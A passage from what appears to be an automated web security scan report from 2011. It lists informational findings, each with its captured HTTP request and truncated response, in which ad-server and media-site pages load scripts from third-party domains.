18.6. http://ad.doubleclick.net/adi/N6092.yahoo.com/B5098223.106  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6092.yahoo.com/B5098223.106

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /adi/N6092.yahoo.com/B5098223.106;sz=300x250;dcopt=rcl;mtfIFPath=nofile;click=http://global.ard.yahoo.com/SIG=15r7bi98f/M=791180.14780275.14568948.10366300/D=o_m_g/S=2115806991:LREC/Y=YAHOO/EXP=1316227937/L=bwVTDGKIOPrpARpjTl.wjQPOMhd7ak5z70EABZ7M/B=ujEzMGKJiTc-/J=1316220737421784/K=u7lEbHJbJbau0b_1blFD.w/A=6464717/R=0/*;ord=0.26470078458078206? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://omg.yahoo.com/xhr/ad/LREC/2115806991?ref=aHR0cDovL2V2ZXJ5dGhpbmcueWFob28uY29tLw==&token=84d07c78645a8b525d402dd67c88d1cb
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6302
Date: Sat, 17 Sep 2011 00:52:57 GMT

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Tue Aug 16 16:54:02 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...

18.7. http://ad.doubleclick.net/adi/N884.abc.com/B5709785.10  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N884.abc.com/B5709785.10

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /adi/N884.abc.com/B5709785.10;sz=728x90;click=http://log.go.com/log?srvc%3dabc%26guid%3d7D9136E5-7896-4338-9939-E469671F34DA%26drop%3d0%26addata%3d0:91104:841141:52312%26a%3d1%26goto%3d;pc=dig841141dc1010790;ord=2011.09.16.17.57.56? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://beta.abc.go.com/shows/charlies-angels/bios
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 1667
Date: Sat, 17 Sep 2011 01:06:03 GMT
Expires: Sat, 17 Sep 2011 01:11:03 GMT

<script type="text/javascript">
var spongecellParams = {
clickTag: "http://ad.doubleclick.net/click%3Bh%3Dv8/3b85/f/8b/%2a/i%3B243805900%3B1-0%3B0%3B67516235%3B3454-728/90%3B42127629/42145416/1%3B
...[SNIP]...
</script>

<script src="http://cdn.royale.spongecell.com/api/placements/47212992.js" type="text/javascript"></script>
...[SNIP]...

18.8. https://admin.usenetbinaries.com/cgi-bin/signup  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://admin.usenetbinaries.com
Path:   /cgi-bin/signup

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /cgi-bin/signup?package=pro HTTP/1.1
Host: admin.usenetbinaries.com
Connection: keep-alive
Referer: http://www.usenetbinaries.com/l/newsgroups.html?r=aw;kw=usenet&gclid=CLHh78_AoqsCFRRSgwod8HVslQ
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UBReferer=S&aw&T&1316201486&P&&K&usenet&H&2tApedj%2BMqga5hQNxux7lA&C&&R&http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dnntp%2Bserver&U&http%3A%2F%2Fwww.usenetbinaries.com%2Fl%2Fnewsgroups.html

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:32:48 GMT
Server: Apache
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 5402

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><title>
Usenet Binaries Dot Com - New Account Secure Signup
</title>
<meta name="keyw
...[SNIP]...
</div>

<script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

18.9. http://ads.pubmatic.com/HostedThirdPartyPixels/TF/ae_12232010.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pubmatic.com
Path:   /HostedThirdPartyPixels/TF/ae_12232010.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /HostedThirdPartyPixels/TF/ae_12232010.html HTTP/1.1
Host: ads.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://ads.pubmatic.com/AdServer/js/syncuppixels.html?p=27330&s=27331
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; DPFQ=37~4~1315939725; PUBUIDSYNCUPFQ=1~1315939725:4~1315939725; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; SyncRTB=1_1317231223.2_1316712846.3_1317231246.4_1317231246.5_1317231246.6_1317231246.7_1317231246.8_1317231274.10_1317231274.12_1316194474.13_1317231274.14_1317231274.15_1317231274.16_1316108182.18_1316280982.19_1317231382.21_1317231382.22_1317231382; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; KTPCACOOKIE=YES; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; PUBMDCID=1; pubfreq_27331=; pubtime_27331=TMC; PMDTSHR=cat:; KTPCACOOKIE=YES; SYNCUPPIX_ON=YES

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:13:13 GMT
Expires: Sat, 17 Sep 2011 01:56:08 GMT
Last-Modified: Tue, 29 Mar 2011 14:07:54 GMT
Cache-Control: max-age=172800
Content-Type: text/html; charset=UTF-8
ETag: "7b47ce-1da-961de280"
Accept-Ranges: bytes
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Content-Length: 474

<html>

<body>
<script type="text/javascript"><!--
e9 = new Object();
e9.size = "1x1";
//--></script>
<script type="text/javascript" src="http://tags.expo9.exponential.com/tags/PubmaticAE/AudienceSelect/tags.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://tags.expo9.exponential.com/tags/AudienceSelectPublishers/AudienceSelect/tags.js"></script>
...[SNIP]...

18.10. http://afe.specificclick.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://afe.specificclick.net
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /?l=1966491151&sz=728x90&wr=j&t=j&u=http%3A//ad.afy11.net/ad%3FasId%3D1000007248707%26sd%3D2x728x90%26ct%3D15%26enc%3D0%26nif%3D0%26sf%3D0%26sfd%3D0%26ynw%3D0%26anw%3D1%26rand%3D57558110%26rk1%3D25841281%26rk2%3D1316239702.554%26pt%3D0&r=http%3A//bostonherald.com/includes/processAds.bg%3Fposition%3DBottom%26companion%3DTop%2CRight%2CBottom%26page%3Dbh.heraldinteractive.com%252Ftrack%252Finside_track%252Farticle HTTP/1.1
Host: afe.specificclick.net
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000007248707&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=57558110&rk1=25841281&rk2=1316239702.554&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADVIVA=NOTRACK; JSESSIONID=4e7b93d56fbdc433b39cc593f969

Response

HTTP/1.1 200 OK
Server: WebStar 1.0
Cache-Control: no-store,no-cache,must-revalidate,post-check=0,pre-check=0
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: JSESSIONID=4ec01f0c7202511a265d88b8398f; Path=/
Content-Type: application/javascript;charset=ISO-8859-1
Date: Sat, 17 Sep 2011 01:06:55 GMT
Content-Length: 1472

document.write('<div style="z-index:10; position:relative; width:728px">'+'<a href="http://clk.specificclick.net/click/v=5;m=2;l=454;c=179530;b=1063955;ts=20110916210656;dct=http://www.bostonreedcolle
...[SNIP]...
0]; s.async = true; s.src = (document.location.protocol == "https:" ? "https://sb" : "http://b") + ".scorecardresearch.com/beacon.js"; el.parentNode.insertBefore(s, el); })();document.write('<script language="Javascript" type="text/javascript" src="http://pixel.adsafeprotected.com/jspix?anId=144&pubId=454&campId=179530"></script>
...[SNIP]...

18.11. http://attuverseoffers.com/tv_hsi_bundles/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://attuverseoffers.com
Path:   /tv_hsi_bundles/index.php

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /tv_hsi_bundles/index.php?sendVar=20State_49PromoOffer&source=ECbc0000000WIP00O HTTP/1.1
Host: attuverseoffers.com
Proxy-Connection: keep-alive
Referer: http://track.pubmatic.com/AdServer/AdDisplayTrackerServlet?clickData=wmoAAMNqAAA/WgAAOAUAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAANgCAABaAAAABwAAAAAAAAAAAAAAAgAAADU1Nzg1MzA3LUE1REMtNEUzQS1CNDUyLUREQkQ0MjZEM0ExRAAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAA_url=http://clk.atdmt.com/go/335787632/direct;wi.728;hi.90;ai.236941493;ct.1/01
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.3.3
Set-Cookie: origin=20State_49PromoOffer; expires=Mon, 17-Oct-2011 01:38:39 GMT; path=/; domain=attuvereseoffers.com
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 01:38:39 GMT
Content-Length: 19572


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<!-- JAVASCRIPTS -->
<script language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.0/jquery.min.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://static.meteorsolutions.com/metsol.js"></script>
...[SNIP]...
<!--Google Analytics -->

<script src="http://www.att.com/webtrends/scripts/dcs_tag.js" type="text/javascript"></script>
...[SNIP]...

18.12. http://beta.abc.go.com/shows/charlies-angels  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://beta.abc.go.com
Path:   /shows/charlies-angels

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /shows/charlies-angels HTTP/1.1
Host: beta.abc.go.com
Proxy-Connection: keep-alive
Referer: http://s0.2mdn.net/1249573/CA_300x600.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SWID=3EF1FA6F-091B-486C-85DF-D05197149F77

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:02:01 GMT
Server: Apache/2.2.16 (Amazon)
X-Powered-By: PHP/5.3.3
Vary: Accept-Encoding
Content-Length: 28315
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://developers.facebook.com/sche
...[SNIP]...
<link href="http://cdn.beta.abc.com/g/css/0/2419/charlies-angels/show:charlies-angels,abccom.css" media="screen" rel="stylesheet" type="text/css" />
   <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
<script type="text/javascript" src="http://cdn.gigya.com/JS/gigya.js?services=socialize"></script>
<script type="text/javascript" src="http://connect.facebook.net/en_US/all.js"></script>
<script type="text/javascript" src="http://a.abc.com/service/gremlin/js/files/ifixpng,scrollto,hook,jquery-bbq,jquery-rc4,parseurl,abc-utils,register-loader,social-link,register-abcreg,cookie,msgqueue,swfobject,sendmsg,global,share-global,facebook,facebooklike,autocompleter.js?cb=v9.00"></script>
   <script type="text/javascript" src="http://cdn.beta.abc.com/g/js/0/2419/charlies-angels/global,sharebar.js"></script>
   <script type="text/javascript" src="http://cdn.beta.abc.com/g/js/0/2419/charlies-angels/bu:abccom.js"></script>
   <script type="text/javascript" src="http://cdn.beta.abc.com/g/js/0/2419/charlies-angels/sfplayer,ad,shownavigation,biodetails,standardcallout,bonuslist.js"></script>
   <script type="text/javascript" src="http://cdn.beta.abc.com/g/js/0/2419/charlies-angels/show:charlies-angels,abccom.js"></script>
...[SNIP]...
</div>
   <script src="http://adm.fwmrm.net/p/release/latest-JS/adm/prd/AdManager.js"></script>
   <script src="http://ll.static.abc.com/m/vp2/sfp/prod/v1.0.0/js/abc/sfp2.js?cb=100"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://a.abc.com/service/gremlin/js/files/s_code.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.13. http://beta.abc.go.com/shows/charlies-angels/bios  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://beta.abc.go.com
Path:   /shows/charlies-angels/bios

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /shows/charlies-angels/bios HTTP/1.1
Host: beta.abc.go.com
Proxy-Connection: keep-alive
Referer: http://beta.abc.go.com/shows/charlies-angels
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SWID=3EF1FA6F-091B-486C-85DF-D05197149F77; main=main5; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; CRBLM=CBLM-001:; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; CRBLM_LAST_UPDATE=1316221045:3EF1FA6F-091B-486C-85DF-D05197149F77; __qca=P0-1786187622-1316239132472; SEEN2=um8Mie4O:; TSC=1; s_vi=[CS]v1|2739F83B85010A2F-40000104E00EC2C5[CE]; s_pers=%20s_gpv_pn%3Dabccom%253Aprimetime%253Acharlies-angels%253Aindex%7C1316240959985%3B; s_sess=%20s_cc%3Dtrue%3B%20s_omni_lid%3Datxt%252Bbios%255Eabccom%253Aprimetime%253Acharlies-angels%253Aindex%3B%20s_sq%3Dwdgabccom%252Cwdgasec%253D%252526pid%25253Dabccom%2525253Aprimetime%2525253Acharlies-angels%2525253Aindex%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//beta.abc.go.com/shows/charlies-angels/bios%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:05:43 GMT
Server: Apache/2.2.16 (Amazon)
X-Powered-By: PHP/5.3.3
Vary: Accept-Encoding
Content-Length: 28574
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://developers.facebook.com/sche
...[SNIP]...
<link href="http://cdn.beta.abc.com/g/css/0/2419/charlies-angels/show:charlies-angels,abccom.css" media="screen" rel="stylesheet" type="text/css" />
   <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
<script type="text/javascript" src="http://cdn.gigya.com/JS/gigya.js?services=socialize"></script>
<script type="text/javascript" src="http://connect.facebook.net/en_US/all.js"></script>
<script type="text/javascript" src="http://a.abc.com/service/gremlin/js/files/ifixpng,scrollto,hook,jquery-bbq,jquery-rc4,parseurl,abc-utils,register-loader,social-link,register-abcreg,cookie,msgqueue,swfobject,sendmsg,global,share-global,facebook,facebooklike,autocompleter.js?cb=v9.00"></script>
   <script type="text/javascript" src="http://cdn.beta.abc.com/g/js/0/2419/charlies-angels/global,sharebar.js"></script>
   <script type="text/javascript" src="http://cdn.beta.abc.com/g/js/0/2419/charlies-angels/bu:abccom.js"></script>
   <script type="text/javascript" src="http://cdn.beta.abc.com/g/js/0/2419/charlies-angels/ad,breakingnews,shownavigation,biodetails,bonuslist,standardcallout.js"></script>
   <script type="text/javascript" src="http://cdn.beta.abc.com/g/js/0/2419/charlies-angels/show:charlies-angels,abccom.js"></script>
...[SNIP]...
</script>
    <script type="text/javascript" src="http://adsyndication.msn.com/delivery/getads.js" ></script>
...[SNIP]...
</script>
    <script type="text/javascript" src="http://adsyndication.msn.com/delivery/getads.js" ></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://a.abc.com/service/gremlin/js/files/s_code.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.14. http://beta.abc.go.com/shows/charlies-angels/bios/eve-french  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://beta.abc.go.com
Path:   /shows/charlies-angels/bios/eve-french

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /shows/charlies-angels/bios/eve-french HTTP/1.1
Host: beta.abc.go.com
Proxy-Connection: keep-alive
Referer: http://beta.abc.go.com/shows/charlies-angels/bios
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SWID=3EF1FA6F-091B-486C-85DF-D05197149F77; main=main5; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; CRBLM=CBLM-001:; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; CRBLM_LAST_UPDATE=1316221045:3EF1FA6F-091B-486C-85DF-D05197149F77; __qca=P0-1786187622-1316239132472; s_vi=[CS]v1|2739F83B85010A2F-40000104E00EC2C5[CE]; DETECT=1.0.0&90557&15933611&1&1; tqq=$D$; SEEN2=um8Mie4Oum8Mie4O:; TSC=1; s_pers=%20s_gpv_pn%3Dabccom%253Aprimetime%253Acharlies-angels%253Abios%7C1316240969097%3B; s_sess=%20s_cc%3Dtrue%3B%20s_omni_lid%3Datxt%252Bhttp%253A//cdn.beta.abc.com/service/image/index/id/aa88242c-a3c5-42a3-bcd4-ce165199b8b8/dim/172x96.jpg%255Eabccom%253Aprimetime%253Acharlies-angels%253Abios%3B%20s_sq%3Dwdgabccom%252Cwdgasec%253D%252526pid%25253Dabccom%2525253Aprimetime%2525253Acharlies-angels%2525253Abios%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//beta.abc.go.com/shows/charlies-angels/bios/eve-french%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:07:29 GMT
Server: Apache/2.2.16 (Amazon)
X-Powered-By: PHP/5.3.3
Vary: Accept-Encoding
Content-Length: 25940
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://developers.facebook.com/sche
...[SNIP]...
<link href="http://cdn.beta.abc.com/g/css/0/2419/charlies-angels/show:charlies-angels,abccom.css" media="screen" rel="stylesheet" type="text/css" />
   <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
<script type="text/javascript" src="http://cdn.gigya.com/JS/gigya.js?services=socialize"></script>
<script type="text/javascript" src="http://connect.facebook.net/en_US/all.js"></script>
<script type="text/javascript" src="http://a.abc.com/service/gremlin/js/files/ifixpng,scrollto,hook,jquery-bbq,jquery-rc4,parseurl,abc-utils,register-loader,social-link,register-abcreg,cookie,msgqueue,swfobject,sendmsg,global,share-global,facebook,facebooklike,autocompleter.js?cb=v9.00"></script>
   <script type="text/javascript" src="http://cdn.beta.abc.com/g/js/0/2419/charlies-angels/global,sharebar.js"></script>
   <script type="text/javascript" src="http://cdn.beta.abc.com/g/js/0/2419/charlies-angels/bu:abccom.js"></script>
   <script type="text/javascript" src="http://cdn.beta.abc.com/g/js/0/2419/charlies-angels/ad,breakingnews,shownavigation,quotes,biodetails,gallery,standardcallout.js"></script>
   <script type="text/javascript" src="http://cdn.beta.abc.com/g/js/0/2419/charlies-angels/show:charlies-angels,abccom.js"></script>
...[SNIP]...
</script>
    <script type="text/javascript" src="http://adsyndication.msn.com/delivery/getads.js" ></script>
...[SNIP]...
</script>
    <script type="text/javascript" src="http://adsyndication.msn.com/delivery/getads.js" ></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://a.abc.com/service/gremlin/js/files/s_code.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.15. http://bgs-soft.com/Products_Sgagent.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bgs-soft.com
Path:   /Products_Sgagent.asp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Products_Sgagent.asp HTTP/1.1
Host: bgs-soft.com
Proxy-Connection: keep-alive
Referer: http://bgs-soft.com/Products_Sgagent.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 21164
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Fri, 16 Sep 2011 19:47:16 GMT

<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta NAME="TITLE" CONTENT="Oracle SQL Server DB2 Database Powerful Online and Background Monitor - SG.Agent">
<me
...[SNIP]...
<p align="left">
<script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
</form>
   <script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&amp;lang=en"></script>
...[SNIP]...
</script>

<script type="text/javascript"
src="http://www.statcounter.com/counter/counter.js">
</script>
...[SNIP]...

18.16. http://bgs-soft.com/UsAndThem.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bgs-soft.com
Path:   /UsAndThem.asp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /UsAndThem.asp HTTP/1.1
Host: bgs-soft.com
Proxy-Connection: keep-alive
Referer: http://bgs-soft.com/Products_Sgagent.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDACASQTDT=JKEDODNBMJIIGLEJDFDLONHK

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 17460
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Fri, 16 Sep 2011 19:47:37 GMT

<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta NAME="TITLE" CONTENT="Oracle SQL Server DB2 Database Powerful Online and Background Monitor - SG.Agent">
<me
...[SNIP]...
<p align="left">
<script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
</form>
   <script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&amp;lang=en"></script>
...[SNIP]...
</script>

<script type="text/javascript"
src="http://www.statcounter.com/counter/counter.js">
</script>
...[SNIP]...

18.17. http://bh.heraldinteractive.com/includes/processAds.bg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bh.heraldinteractive.com
Path:   /includes/processAds.bg

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /includes/processAds.bg?position=Top&companion=Top,x14,x15,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com/news/home HTTP/1.1
Host: bh.heraldinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/mobile/info.bg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1141638517-1316021781233

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:50:07 GMT
Server: Apache/2.2.4 (Unix) PHP/5.2.0-8+etch16
X-Powered-By: PHP/5.2.0-8+etch16
Vary: Accept-Encoding
Content-Length: 1854
Connection: close
Content-Type: text/html


<style type="text/css">
   /* div { top: 0px; } */
</style>


<!--- 1st Section: Delivery Attempt via JX tag. --->
<SCRIPT LANGUAGE="JavaScript1.1" SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@Top,x14,x15,Middle,Middle1,Middle2,Bottom!Top"></script>
...[SNIP]...

18.18. http://bh.heraldinteractive.com/includes/processAds.bg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bh.heraldinteractive.com
Path:   /includes/processAds.bg

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /includes/processAds.bg?position=Middle1&companion=Top,x14,x15,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com/news/home HTTP/1.1
Host: bh.heraldinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/mobile/info.bg
